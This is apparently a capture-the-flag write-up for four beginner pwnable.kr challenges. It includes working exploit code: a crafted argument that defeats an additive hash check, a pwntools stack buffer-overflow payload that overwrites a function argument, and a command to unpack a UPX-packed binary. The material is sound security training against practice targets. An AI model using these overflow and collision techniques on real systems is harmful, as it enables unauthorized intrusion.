[Toddler's Bottle]

fd

Pwn:

[Image 1]

Reason:

When fd is 0 it refers to standard input, i.e. the console, so buf == "LETMEWIN\n" can be satisfied by typing that line. I edited fd.c slightly and saved it as 1.c for testing; compile it with "gcc 1.c -o 1".

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>   /* read(); the headers were lost in extraction and are restored here */
char buf[32];
int main(int argc, char* argv[], char* envp[]){
	if(argc<2)
	{
		printf("pass argv[1] a number\n");
		return 0;
	}
	printf("%s %s\n",argv[0],argv[1]);
	/* atoi() parses decimal only: argv[1] must be 4660 (= 0x1234) to make fd 0, i.e. stdin */
	int fd = atoi( argv[1] ) - 0x1234;
	printf("fd:%d\n",fd);
	int len = 0;
	len = read(fd, buf, 32);   /* with fd == 0 this reads the line typed on the console */
	if(!strcmp("LETMEWIN\n", buf)){
		printf("good job :)\n");
		system("/bin/cat flag");
		exit(0);
	}
	printf("learn about Linux file IO\n");
	return 0;
}

I originally wanted to pass 0x1234 directly, but after atoi it becomes 0; evidently atoi does not handle hexadecimal.

[Image 2]


collision

Pwn:

col@pwnable:~$ ./col `python -c "print '\xe8\x05\xd9\x1d'+'\x01\x01\x01\x01'*4"`

Reason:

hashcode = A + B + B + B + B, where A is the first 4-byte word of the argument (\xe8\x05\xd9\x1d) and B is the word \x01\x01\x01\x01 repeated four times; the check only sums the five words, so A is chosen so that the total lands on the expected hashcode.

pwntools' p32 is a quick way to get the little-endian packing of each word.
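As an added example (not part of the writeup), a standard-library Python script that recomputes the challenge's sum-of-five-words hash over the argument shown above, and regenerates that argument from the resulting value the same way the writeup does: one free word A plus four filler words B. The 20-byte length and the word sum mirror the formula above; the NUL-byte check reflects that an argv string cannot carry a zero byte.

```python
import struct

# The argument from the col command above, constructed here as bytes.
WRITEUP_PAYLOAD = b"\xe8\x05\xd9\x1d" + b"\x01\x01\x01\x01" * 4


def hashcode(data: bytes) -> int:
    """Sum the five little-endian 32-bit words of a 20-byte input, mod 2**32.

    This is the writeup's hashcode = A + B + B + B + B: an additive hash does
    no mixing, so any five words with the right sum collide with the target.
    """
    if len(data) != 20:
        raise ValueError("input must be exactly 20 bytes")
    words = struct.unpack("<5I", data)
    return sum(words) & 0xFFFFFFFF


def collide(target: int, filler: int = 0x01010101) -> bytes:
    """Build a 20-byte input whose hashcode() equals target.

    Four words are the filler B; the first word is A = target - 4*B (mod 2**32),
    exactly as in the writeup. argv strings are NUL-terminated, so a result that
    contains a 0x00 byte is rejected (choose a different filler in that case).
    """
    a = (target - 4 * filler) & 0xFFFFFFFF
    data = struct.pack("<5I", a, filler, filler, filler, filler)
    if b"\x00" in data:
        raise ValueError("payload contains a NUL byte; choose another filler")
    return data


if __name__ == "__main__":
    target = hashcode(WRITEUP_PAYLOAD)
    print(f"hashcode of the writeup's argument: {target:#010x}")
    print("regenerated argument matches writeup:", collide(target) == WRITEUP_PAYLOAD)
```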

[Image 3]



bof

Pwn:

import pwn
# print(os.system('ls'))
col = pwn.process('./bof')
# col= pwn.remote('pwnable.kr', 9000)
# 0x2c bytes fill the buffer up to the saved ebp, 8 more cover the saved ebp and
# the return address, then the key argument is overwritten with 0xcafebabe.
# bytes literals are needed so the concatenation with p32() works under Python 3.
payload = b'a'*0x2c + b'a'*0x8 + pwn.p32(0xcafebabe)
print(payload)
col.sendline(payload)
col.interactive()

Reason:

[Image 4]

flag

Pwn:

upx -d flag

Reason:

https://www.cnblogs.com/zhaijiahui/p/7243735.html 
